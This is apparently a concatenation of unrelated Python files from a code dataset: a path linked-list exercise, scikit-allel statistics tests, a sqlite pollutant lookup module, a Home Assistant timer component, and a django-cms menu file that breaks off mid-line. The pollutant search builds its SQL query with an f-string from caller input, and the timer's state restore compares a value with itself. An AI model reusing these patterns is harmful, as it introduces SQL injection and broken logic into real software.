    """Current working directory kept as a linked list of path components."""

    def __init__(self):
        # A single node holding "\" represents the root directory.
        self.first = No("\\")

    def insert(self, value=None):
        if self.first.value == "\\":
            self.first = No(str(value))
        else:
            aux = self.first
            while aux.next is not None:
                aux = aux.next
            aux.next = No(str(value))

    def remove(self):
        if self.first.value == "\\" or self.first.next is None:
            # Removing the last component (or removing at the root) returns to root.
            self.first = No("\\")
        else:
            aux = self.first
            aux_before = aux
            while aux.next is not None:
                aux_before = aux
                aux = aux.next
            aux_before.next = None

    def show(self):
        if self.first.value == "\\":
            print("\\")
        else:
            text = ""
            aux = self.first
            while aux.next is not None:
                text += "\\" + str(aux.value)
                aux = aux.next
            text += "\\" + str(aux.value)
            print(text)


def main():
    # Read the starting path followed by the commands, until EOF.
    inputs = []
    try:
        while True:
            inputs.append(input())
    except EOFError:
        pass

    diretorio = Diretorio()
    # The first input line is the initial path, e.g. "\home\user".
    for part in inputs[0].split("\\"):
        if part == "":
            continue
        diretorio.insert(part)

    for line in inputs:
        if line.startswith("cd ") and line[3] != ".":
            diretorio.insert(line[3:])
        elif line == "pwd":
            diretorio.show()
        elif line == "cd ..":
            diretorio.remove()


if __name__ == '__main__':
    main()
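

# Illustrative sketch (not part of the original submission): driving the Diretorio
# linked list directly, without stdin, to show what each command in the exercise
# maps to. The path components are made up.
def _example_session():
    d = Diretorio()
    for part in "home\\user".split("\\"):
        d.insert(part)          # seed the starting path
    d.show()                    # prints \home\user
    d.insert("projects")        # "cd projects"
    d.show()                    # prints \home\user\projects
    d.remove()                  # "cd .."
    d.show()                    # prints \home\user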
the-stack_106_24327
# -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, division import unittest import numpy as np from nose.tools import assert_raises, eq_ as eq from allel.test.tools import assert_array_equal as aeq, assert_array_almost_equal import allel from allel.util import ignore_invalid from allel import GenotypeArray, HaplotypeArray, SortedIndex, AlleleCountsArray class TestWindowUtilities(unittest.TestCase): def test_moving_statistic(self): f = allel.moving_statistic values = [2, 5, 8, 16] expect = [7, 24] actual = f(values, statistic=np.sum, size=2) aeq(expect, actual) values = [2, 5, 8, 16] expect = [7, 13, 24] actual = f(values, statistic=np.sum, size=2, step=1) aeq(expect, actual) def test_windowed_statistic(self): f = allel.windowed_statistic pos = [1, 12, 15, 27] # boolean array, all true b = [True, True, True, True] expected_nnz = [1, 2, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10) aeq(expected_nnz, actual_nnz) aeq(expected_windows, actual_windows) aeq(expected_counts, actual_counts) # boolean array, not all true b = [False, True, False, True] expected_nnz = [0, 1, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10) aeq(expected_windows, actual_windows) aeq(expected_nnz, actual_nnz) aeq(expected_counts, actual_counts) # explicit start and stop b = [False, True, False, True] expected_nnz = [1, 0, 1] expected_windows = [[5, 14], [15, 24], [25, 29]] expected_counts = [1, 1, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, np.count_nonzero, 10, start=5, stop=29) aeq(expected_windows, actual_windows) aeq(expected_nnz, actual_nnz) aeq(expected_counts, actual_counts) # boolean array, bad length b = [False, True, False] with assert_raises(ValueError): f(pos, b, np.count_nonzero, 10) # 2D, 4 variants, 2 samples b = [[True, False], [True, True], [True, False], [True, True]] expected_nnz = [[1, 0], [2, 1], [1, 1]] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] actual_nnz, actual_windows, actual_counts = \ f(pos, b, statistic=lambda x: np.sum(x, axis=0), size=10) aeq(expected_nnz, actual_nnz) aeq(expected_windows, actual_windows) aeq(expected_counts, actual_counts) def test_per_base(self): pos = [1, 12, 15, 27] # boolean array, all true b = [True, True, True, True] # N.B., final bin includes right edge expected_nnz = [1, 2, 1] expected_windows = [[1, 10], [11, 20], [21, 27]] expected_counts = [1, 2, 1] expected_densities = [1/10, 2/10, 1/7] expected_n_bases = [10, 10, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_nnz, nnz) aeq(expected_windows, windows) aeq(expected_counts, counts) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # boolean array, not all true b = [False, True, False, True] expected_densities = [0/10, 1/10, 1/7] expected_n_bases = [10, 10, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # 2D, 4 variants, 2 samples b = [[True, False], [True, True], [True, False], [True, True]] expected_densities = [[1/10, 0/10], [2/10, 1/10], [1/7, 1/7]] expected_n_bases = [10, 10, 7] nnz, windows, counts = 
allel.windowed_statistic( pos, b, statistic=lambda x: np.sum(x, axis=0), size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) # include is_accessible array option is_accessible = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=bool) b = [False, True, False, True] expected_densities = [-1, 1/6, 1/7] expected_n_bases = [0, 6, 7] nnz, windows, counts = allel.windowed_statistic( pos, b, statistic=np.count_nonzero, size=10, start=1 ) densities, n_bases = allel.per_base(nnz, windows, is_accessible=is_accessible, fill=-1) aeq(expected_densities, densities) aeq(expected_n_bases, n_bases) class TestDiversityDivergence(unittest.TestCase): def test_mean_pairwise_diversity(self): # start with simplest case, two haplotypes, one pairwise comparison h = HaplotypeArray([[0, 0], [1, 1], [0, 1], [1, 2], [0, -1], [-1, -1]]) ac = h.count_alleles() expect = [0, 0, 1, 1, -1, -1] actual = allel.mean_pairwise_difference(ac, fill=-1) aeq(expect, actual) # four haplotypes, 6 pairwise comparison h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) ac = h.count_alleles() expect = [0, 3/6, 4/6, 3/6, 0, 5/6, 5/6, 1, -1] actual = allel.mean_pairwise_difference(ac, fill=-1) assert_array_almost_equal(expect, actual) def test_sequence_divergence(self): from allel import sequence_divergence pos = [2, 4, 8] ac1 = AlleleCountsArray([[2, 0], [2, 0], [2, 0]]) ac2 = AlleleCountsArray([[0, 2], [0, 2], [0, 2]]) # all variants e = 3 / 7 a = sequence_divergence(pos, ac1, ac2) eq(e, a) # start/stop e = 2 / 6 a = sequence_divergence(pos, ac1, ac2, start=0, stop=5) eq(e, a) # start/stop, an provided an1 = ac1.sum(axis=1) an2 = ac2.sum(axis=1) e = 2 / 6 a = sequence_divergence(pos, ac1, ac2, start=0, stop=5, an1=an1, an2=an2) eq(e, a) def test_windowed_diversity(self): # four haplotypes, 6 pairwise comparison h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) ac = h.count_alleles() # mean pairwise diversity # expect = [0, 3/6, 4/6, 3/6, 0, 5/6, 5/6, 1, -1] pos = SortedIndex([2, 4, 7, 14, 15, 18, 19, 25, 27]) expect = [(7/6)/10, (13/6)/10, 1/11] actual, _, _, _ = allel.windowed_diversity(pos, ac, size=10, start=1, stop=31) assert_array_almost_equal(expect, actual) def test_mean_pairwise_divergence(self): # simplest case, two haplotypes in each population h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) h1 = h.take([0, 1], axis=1) h2 = h.take([2, 3], axis=1) ac1 = h1.count_alleles() ac2 = h2.count_alleles() expect = [0/4, 2/4, 4/4, 2/4, 0/4, 4/4, 3/4, -1, -1] actual = allel.mean_pairwise_difference_between(ac1, ac2, fill=-1) aeq(expect, actual) def test_windowed_divergence(self): # simplest case, two haplotypes in each population h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) h1 = h.take([0, 1], axis=1) h2 = h.take([2, 3], axis=1) ac1 = h1.count_alleles() ac2 = h2.count_alleles() # mean pairwise divergence # expect = [0/4, 2/4, 4/4, 2/4, 0/4, 4/4, 3/4, -1, -1] pos = SortedIndex([2, 4, 7, 14, 15, 18, 19, 25, 27]) expect = [(6/4)/10, (9/4)/10, 0/11] actual, _, _, _ = allel.windowed_divergence( pos, 
ac1, ac2, size=10, start=1, stop=31 ) assert_array_almost_equal(expect, actual) class TestHardyWeinberg(unittest.TestCase): def test_heterozygosity_observed(self): # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') expect = [0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1] actual = allel.heterozygosity_observed(g, fill=-1) aeq(expect, actual) # polyploid g = GenotypeArray([[[0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1]], [[1, 1, 1], [2, 2, 2]], [[0, 0, 0], [0, 0, 1]], [[0, 0, 0], [0, 0, 2]], [[1, 1, 1], [0, 1, 2]], [[0, 0, 1], [0, 1, 1]], [[0, 1, 1], [0, 1, 2]], [[0, 0, 0], [-1, -1, -1]], [[0, 0, 1], [-1, -1, -1]], [[-1, -1, -1], [-1, -1, -1]]], dtype='i1') expect = [0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1] actual = allel.heterozygosity_observed(g, fill=-1) aeq(expect, actual) def test_heterozygosity_expected(self): def refimpl(f, ploidy, fill=0): """Limited reference implementation for testing purposes.""" # check allele frequencies sum to 1 af_sum = np.sum(f, axis=1) # assume three alleles p = f[:, 0] q = f[:, 1] r = f[:, 2] out = 1 - p**ploidy - q**ploidy - r**ploidy with ignore_invalid(): out[(af_sum < 1) | np.isnan(af_sum)] = fill return out # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') expect1 = [0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, -1] af = g.count_alleles().to_frequencies() expect2 = refimpl(af, ploidy=g.ploidy, fill=-1) actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=-1) assert_array_almost_equal(expect1, actual) assert_array_almost_equal(expect2, actual) expect3 = [0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, 0] actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=0) assert_array_almost_equal(expect3, actual) # polyploid g = GenotypeArray([[[0, 0, 0], [0, 0, 0]], [[1, 1, 1], [1, 1, 1]], [[1, 1, 1], [2, 2, 2]], [[0, 0, 0], [0, 0, 1]], [[0, 0, 0], [0, 0, 2]], [[1, 1, 1], [0, 1, 2]], [[0, 0, 1], [0, 1, 1]], [[0, 1, 1], [0, 1, 2]], [[0, 0, 0], [-1, -1, -1]], [[0, 0, 1], [-1, -1, -1]], [[-1, -1, -1], [-1, -1, -1]]], dtype='i1') af = g.count_alleles().to_frequencies() expect = refimpl(af, ploidy=g.ploidy, fill=-1) actual = allel.heterozygosity_expected(af, ploidy=g.ploidy, fill=-1) assert_array_almost_equal(expect, actual) def test_inbreeding_coefficient(self): # diploid g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') # ho = np.array([0, 0, 0, .5, .5, .5, 1, 1, 0, 1, -1]) # he = np.array([0, 0, 0.5, .375, .375, .375, .5, .625, 0, .5, -1]) # expect = 1 - (ho/he) expect = [-1, -1, 1-0, 1-(.5/.375), 1-(.5/.375), 1-(.5/.375), 1-(1/.5), 1-(1/.625), -1, 1-(1/.5), -1] actual = allel.inbreeding_coefficient(g, fill=-1) assert_array_almost_equal(expect, actual) class TestDistance(unittest.TestCase): def test_pdist(self): h = HaplotypeArray([[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 1], [0, 1, 1, 1], [1, 1, 1, 1], [0, 0, 1, 2], [0, 1, 1, 2], [0, 1, -1, -1], [-1, -1, -1, -1]]) import scipy.spatial d1 = scipy.spatial.distance.pdist(h.T, 'hamming') d2 = allel.stats.distance.pdist(h, 'hamming') aeq(d1, 
d2) def test_pairwise_distance_multidim(self): g = GenotypeArray([[[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 1], [2, 2]], [[0, 0], [0, 1]], [[0, 0], [0, 2]], [[1, 1], [1, 2]], [[0, 1], [0, 1]], [[0, 1], [1, 2]], [[0, 0], [-1, -1]], [[0, 1], [-1, -1]], [[-1, -1], [-1, -1]]], dtype='i1') gac = g.to_allele_counts() def metric(ac1, ac2): mpd = allel.mean_pairwise_difference_between(ac1, ac2, fill=0) return mpd.sum() expect = [allel.mean_pairwise_difference_between(gac[:, 0], gac[:, 1], fill=0).sum()] actual = allel.pairwise_distance(gac, metric) aeq(expect, actual) def test_condensed_coords(self): from allel import condensed_coords eq(0, condensed_coords(0, 1, 2)) eq(0, condensed_coords(1, 0, 2)) eq(0, condensed_coords(0, 1, 3)) eq(0, condensed_coords(1, 0, 3)) eq(1, condensed_coords(0, 2, 3)) eq(1, condensed_coords(2, 0, 3)) eq(2, condensed_coords(1, 2, 3)) eq(2, condensed_coords(2, 1, 3)) with assert_raises(ValueError): condensed_coords(0, 0, 1) condensed_coords(0, 1, 1) condensed_coords(1, 0, 1) condensed_coords(0, 0, 2) condensed_coords(0, 2, 2) condensed_coords(2, 0, 2) condensed_coords(1, 1, 2) condensed_coords(0, 0, 3) condensed_coords(1, 1, 3) condensed_coords(2, 2, 3) def test_condensed_coords_within(self): from allel import condensed_coords_within pop = [0, 1] n = 3 expect = [0] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 2] n = 3 expect = [1] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [1, 2] n = 3 expect = [2] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 1, 3] n = 4 expect = [0, 2, 4] actual = condensed_coords_within(pop, n) eq(expect, actual) pop = [0, 0] with assert_raises(ValueError): condensed_coords_within(pop, n) def test_condensed_coords_between(self): from allel import condensed_coords_between pop1 = [0, 1] pop2 = [2, 3] n = 4 expect = [1, 2, 3, 4] actual = condensed_coords_between(pop1, pop2, n) eq(expect, actual) pop1 = [0, 2] pop2 = [1, 3] n = 4 expect = [0, 2, 3, 5] actual = condensed_coords_between(pop1, pop2, n) eq(expect, actual) with assert_raises(ValueError): condensed_coords_between(pop1, pop1, n) class TestLinkageDisequilibrium(unittest.TestCase): def test_rogers_huff_r(self): gn = [[0, 1, 2], [0, 1, 2]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2], [2, 1, 0]] expect = -1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 0, 0], [1, 1, 1]] actual = allel.rogers_huff_r(gn) assert np.isnan(actual) gn = [[0, 1, 0, 1], [0, 1, 1, 0]] expect = 0 actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2, -1], [0, 1, 2, 2]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2, 2], [0, 1, 2, -1]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 1, 2], [0, 1, -1]] expect = 1. actual = allel.rogers_huff_r(gn) eq(expect, actual) gn = [[0, 2], [2, 0], [0, 1]] expect = [-1, 1, -1] actual = allel.rogers_huff_r(gn) assert_array_almost_equal(expect, actual) gn = [[0, 2, 0], [0, 2, 0], [2, 0, 2], [0, 2, -1]] expect = [1, -1, 1, -1, 1, -1] actual = allel.rogers_huff_r(gn) assert_array_almost_equal(expect, actual) def test_rogers_huff_r_between(self): gna = [[0, 1, 2]] gnb = [[0, 1, 2]] expect = 1. actual = allel.rogers_huff_r_between(gna, gnb) eq(expect, actual) gna = [[0, 1, 2]] gnb = [[2, 1, 0]] expect = -1. 
actual = allel.rogers_huff_r_between(gna, gnb) eq(expect, actual) gna = [[0, 0, 0]] gnb = [[1, 1, 1]] actual = allel.rogers_huff_r_between(gna, gnb) assert np.isnan(actual) def test_locate_unlinked(self): gn = [[0, 1, 2], [0, 1, 2]] expect = [True, False] actual = allel.locate_unlinked(gn, size=2, step=2, threshold=.5) aeq(expect, actual) gn = [[0, 1, 1, 2], [0, 1, 1, 2], [1, 1, 0, 2], [1, 1, 0, 2]] actual = allel.locate_unlinked(gn, size=2, step=1, threshold=.5) expect = [True, False, True, False] aeq(expect, actual) gn = [[0, 1, 1, 2], [0, 1, 1, 2], [0, 1, 1, 2], [1, 1, 0, 2], [1, 1, 0, 2]] actual = allel.locate_unlinked(gn, size=2, step=1, threshold=.5) expect = [True, False, True, True, False] aeq(expect, actual) actual = allel.locate_unlinked(gn, size=3, step=1, threshold=.5) expect = [True, False, False, True, False] aeq(expect, actual) # test with bcolz carray import bcolz gnz = bcolz.carray(gn, chunklen=2) actual = allel.locate_unlinked(gnz, size=2, step=1, threshold=.5, blen=2) expect = [True, False, True, True, False] aeq(expect, actual) class TestAdmixture(unittest.TestCase): def test_patterson_f2(self): aca = [[0, 2], [2, 0], [1, 1], [0, 0]] acb = [[0, 2], [0, 2], [0, 2], [0, 2]] expect = [0., 1., 0., np.nan] actual = allel.patterson_f2(aca, acb) assert_array_almost_equal(expect, actual) def test_patterson_f3(self): aca = [[0, 2], [2, 0], [0, 2], [0, 2], [0, 0]] acb = [[2, 0], [0, 2], [0, 2], [0, 2], [0, 2]] acc = [[1, 1], [1, 1], [0, 2], [2, 0], [1, 1]] expect_f3 = [-.5, -.5, 0., 1., np.nan] actual_f3, actual_hzc = allel.patterson_f3(acc, aca, acb) assert_array_almost_equal(expect_f3, actual_f3) expect_hzc = [1., 1., 0., 0., 1.] assert_array_almost_equal(expect_hzc, actual_hzc) def test_patterson_d(self): aca = [[0, 2], [2, 0], [2, 0], [1, 1], [0, 0]] acb = [[0, 2], [0, 2], [0, 2], [1, 1], [0, 2]] acc = [[2, 0], [2, 0], [0, 2], [1, 1], [0, 2]] acd = [[2, 0], [0, 2], [2, 0], [1, 1], [0, 2]] num, den = allel.patterson_d(aca, acb, acc, acd) expect_num = [0., 1., -1., 0., np.nan] expect_den = [0., 1., 1., 0.25, np.nan] assert_array_almost_equal(expect_num, num) assert_array_almost_equal(expect_den, den) class TestSF(unittest.TestCase): def test_sfs(self): dac = [0, 1, 2, 1] expect = [1, 2, 1] actual = allel.sfs(dac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': daca = np.asarray(dac, dtype=dtype) actual = allel.sfs(daca) aeq(expect, actual) def test_sfs_folded(self): ac = [[0, 3], [1, 2], [2, 1]] expect = [1, 2] actual = allel.sfs_folded(ac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': aca = np.asarray(ac, dtype=dtype) actual = allel.sfs_folded(aca) aeq(expect, actual) def test_sfs_scaled(self): dac = [0, 1, 2, 1] expect = [0, 2, 2] actual = allel.sfs_scaled(dac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': daca = np.asarray(dac, dtype=dtype) actual = allel.sfs_scaled(daca) aeq(expect, actual)
the-stack_106_24329
from __future__ import annotations

import sqlite3
from collections import defaultdict
from contextlib import closing, contextmanager
from importlib import resources
from pathlib import Path
from typing import Iterator


def summary() -> Path:
    with resources.path(__package__, "summary.sqlite") as path:
        return path


class DB:
    """
    DB containing the available countries and pollutants
    """

    db = sqlite3.connect(f"file:{summary()}?mode=ro", uri=True)

    @classmethod
    @contextmanager
    def cursor(cls) -> Iterator[sqlite3.Cursor]:
        """db cursor as a "self closing" context manager"""
        with closing(cls.db.cursor()) as cur:
            yield cur

    @classmethod
    def countries(cls) -> list[str]:
        """
        Get the list of unique countries from the summary.

        :return: list of available country codes
        """
        with cls.cursor() as cur:
            cur.execute("SELECT country_code FROM countries;")
            return list(row[0] for row in cur.fetchall())

    @classmethod
    def pollutants(cls) -> dict[str, str]:
        """
        Get the list of unique pollutants from the summary.

        :return: The available pollutants, as a dictionary with
            pollutant names as keys and ids as values,
            e.g. {"NO": "38", ...}
        """
        with cls.cursor() as cur:
            cur.execute("SELECT pollutant, pollutant_id FROM pollutants;")
            return dict(cur.fetchall())

    @classmethod
    def search_pollutant(
        cls, query: str, *, limit: int | None = None
    ) -> dict[str, int]:
        """
        Search for a pollutant's ID number based on its name.

        :param query: The pollutant to search for.
        :param limit: (optional) Max number of results.
        :return: The best pollutant matches, as a dictionary with
            pollutant names as keys and ids as values,
            e.g. {"NO": 38, ...}
        """
        with cls.cursor() as cur:
            cur.execute(
                f"""
                SELECT pollutant, pollutant_id FROM pollutants
                WHERE pollutant LIKE '%{query}%'
                {f"LIMIT {limit}" if limit else ""};
                """
            )
            return dict(cur.fetchall())

    @classmethod
    def pollutants_per_country(cls) -> dict[str, dict[str, int]]:
        """
        Get the available pollutants per country from the summary.

        :return: All available pollutants per country, as a dictionary with
            country codes as keys and a dictionary of pollutant/ids
            (e.g. {"NO": 38, ...}) as values.
        """
        with cls.cursor() as cur:
            cur.execute(
                "SELECT country_code, pollutant, pollutant_id FROM summary"
            )
            output: dict[str, dict[str, int]] = defaultdict(dict)
            for country_code, pollutant, pollutant_id in cur:
                output[country_code][pollutant] = pollutant_id
            return dict(output)
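
# --- Illustrative usage sketch (editor addition, not part of the original
# module). Shows how the DB helper above might be queried; the example values
# depend on the bundled summary.sqlite and are assumptions here.
if __name__ == "__main__":
    print(DB.countries()[:5])                  # e.g. a few country codes
    print(DB.search_pollutant("NO", limit=3))  # name -> pollutant_id matches
    per_country = DB.pollutants_per_country()
    print(len(per_country), "countries with pollutant tables")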
the-stack_106_24330
"""Support for Timers.""" from datetime import timedelta import logging import voluptuous as vol from homeassistant.const import ATTR_ENTITY_ID, CONF_ICON, CONF_NAME import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.event import async_track_point_in_utc_time from homeassistant.helpers.restore_state import RestoreEntity import homeassistant.util.dt as dt_util _LOGGER = logging.getLogger(__name__) DOMAIN = 'timer' ENTITY_ID_FORMAT = DOMAIN + '.{}' DEFAULT_DURATION = 0 ATTR_DURATION = 'duration' ATTR_REMAINING = 'remaining' CONF_DURATION = 'duration' STATUS_IDLE = 'idle' STATUS_ACTIVE = 'active' STATUS_PAUSED = 'paused' EVENT_TIMER_FINISHED = 'timer.finished' EVENT_TIMER_CANCELLED = 'timer.cancelled' EVENT_TIMER_STARTED = 'timer.started' EVENT_TIMER_RESTARTED = 'timer.restarted' EVENT_TIMER_PAUSED = 'timer.paused' SERVICE_START = 'start' SERVICE_PAUSE = 'pause' SERVICE_CANCEL = 'cancel' SERVICE_FINISH = 'finish' SERVICE_SCHEMA = vol.Schema({ vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids, }) SERVICE_SCHEMA_DURATION = vol.Schema({ vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids, vol.Optional(ATTR_DURATION, default=timedelta(DEFAULT_DURATION)): cv.time_period, }) CONFIG_SCHEMA = vol.Schema({ DOMAIN: cv.schema_with_slug_keys( vol.Any({ vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_ICON): cv.icon, vol.Optional(CONF_DURATION, timedelta(DEFAULT_DURATION)): cv.time_period, }, None) ) }, extra=vol.ALLOW_EXTRA) async def async_setup(hass, config): """Set up a timer.""" component = EntityComponent(_LOGGER, DOMAIN, hass) entities = [] for object_id, cfg in config[DOMAIN].items(): if not cfg: cfg = {} name = cfg.get(CONF_NAME) icon = cfg.get(CONF_ICON) duration = cfg.get(CONF_DURATION) entities.append(Timer(hass, object_id, name, icon, duration)) if not entities: return False component.async_register_entity_service( SERVICE_START, SERVICE_SCHEMA_DURATION, 'async_start') component.async_register_entity_service( SERVICE_PAUSE, SERVICE_SCHEMA, 'async_pause') component.async_register_entity_service( SERVICE_CANCEL, SERVICE_SCHEMA, 'async_cancel') component.async_register_entity_service( SERVICE_FINISH, SERVICE_SCHEMA, 'async_finish') await component.async_add_entities(entities) return True class Timer(RestoreEntity): """Representation of a timer.""" def __init__(self, hass, object_id, name, icon, duration): """Initialize a timer.""" self.entity_id = ENTITY_ID_FORMAT.format(object_id) self._name = name self._state = STATUS_IDLE self._duration = duration self._remaining = self._duration self._icon = icon self._hass = hass self._end = None self._listener = None @property def should_poll(self): """If entity should be polled.""" return False @property def name(self): """Return name of the timer.""" return self._name @property def icon(self): """Return the icon to be used for this entity.""" return self._icon @property def state(self): """Return the current value of the timer.""" return self._state @property def state_attributes(self): """Return the state attributes.""" return { ATTR_DURATION: str(self._duration), ATTR_REMAINING: str(self._remaining) } async def async_added_to_hass(self): """Call when entity is about to be added to Home Assistant.""" # If not None, we got an initial value. 
if self._state is not None: return state = await self.async_get_last_state() self._state = state and state.state == state async def async_start(self, duration): """Start a timer.""" if self._listener: self._listener() self._listener = None newduration = None if duration: newduration = duration event = EVENT_TIMER_STARTED if self._state == STATUS_PAUSED: event = EVENT_TIMER_RESTARTED self._state = STATUS_ACTIVE # pylint: disable=redefined-outer-name start = dt_util.utcnow() if self._remaining and newduration is None: self._end = start + self._remaining else: if newduration: self._duration = newduration self._remaining = newduration else: self._remaining = self._duration self._end = start + self._duration self._hass.bus.async_fire(event, {"entity_id": self.entity_id}) self._listener = async_track_point_in_utc_time(self._hass, self.async_finished, self._end) await self.async_update_ha_state() async def async_pause(self): """Pause a timer.""" if self._listener is None: return self._listener() self._listener = None self._remaining = self._end - dt_util.utcnow() self._state = STATUS_PAUSED self._end = None self._hass.bus.async_fire(EVENT_TIMER_PAUSED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_cancel(self): """Cancel a timer.""" if self._listener: self._listener() self._listener = None self._state = STATUS_IDLE self._end = None self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_CANCELLED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_finish(self): """Reset and updates the states, fire finished event.""" if self._state != STATUS_ACTIVE: return self._listener = None self._state = STATUS_IDLE self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_FINISHED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_finished(self, time): """Reset and updates the states, fire finished event.""" if self._state != STATUS_ACTIVE: return self._listener = None self._state = STATUS_IDLE self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_FINISHED, {"entity_id": self.entity_id}) await self.async_update_ha_state()
the-stack_106_24332
# -*- coding: utf-8 -*- import re from menus.menu_pool import menu_pool from menus.base import Menu, NavigationNode, Modifier from cms.utils import get_language_from_request from cms.utils.moderator import get_page_queryset, get_title_queryset from django.conf import settings from django.contrib.sites.models import Site from django.core.exceptions import ObjectDoesNotExist from cms.utils.i18n import get_fallback_languages from cms.apphook_pool import apphook_pool from cms.models.titlemodels import Title def page_to_node(page, home, cut): parent_id = page.parent_id if home and page.parent_id == home.pk and cut: parent_id = None # possible fix for a possible problem #if parent_id and not page.parent.get_calculated_status(): # parent_id = None # ???? attr = {'soft_root':page.soft_root, 'auth_required':page.login_required, 'reverse_id':page.reverse_id,} if page.limit_visibility_in_menu == None: attr['visible_for_authenticated'] = True attr['visible_for_anonymous'] = True else: attr['visible_for_authenticated'] = page.limit_visibility_in_menu == 1 attr['visible_for_anonymous'] = page.limit_visibility_in_menu == 2 if page.pk == home.pk: attr['is_home'] = True # add various times and (maybe) excerpts attr['creation_date'] = page.creation_date attr['publication_date'] = page.publication_date attr['thumbnail'] = None # extracting excerpt... # XXX EXPENSIVE OPERATION!!! attr['excerpt'] = page.get_text_excerpt() extenders = [] if page.navigation_extenders: extenders.append(page.navigation_extenders) try: app_name = page.get_application_urls(fallback=False) except Title.DoesNotExist: app_name = None if app_name: app = apphook_pool.get_apphook(app_name) for menu in app.menus: extenders.append(menu.__name__) attr['redirect_url'] = page.get_redirect() # save redirect URL is any if extenders: attr['navigation_extenders'] = extenders ret_node = NavigationNode( page.get_menu_title(), page.get_absolute_url(), page.pk, parent_id, attr=attr, visible=page.in_navigation, ) return ret_node class CMSMenu(Menu): def get_nodes(self, request): page_queryset = get_page_queryset(request) site = Site.objects.get_current() lang = get_language_from_request(request) filters = { 'site':site, } if settings.CMS_HIDE_UNTRANSLATED: filters['title_set__language'] = lang pages = page_queryset.published().filter(**filters).order_by("tree_id", "lft") ids = [] nodes = [] first = True home_cut = False home_children = [] home = None for page in pages: if not home: home = page page.home_pk_cache = home.pk if first and page.pk != 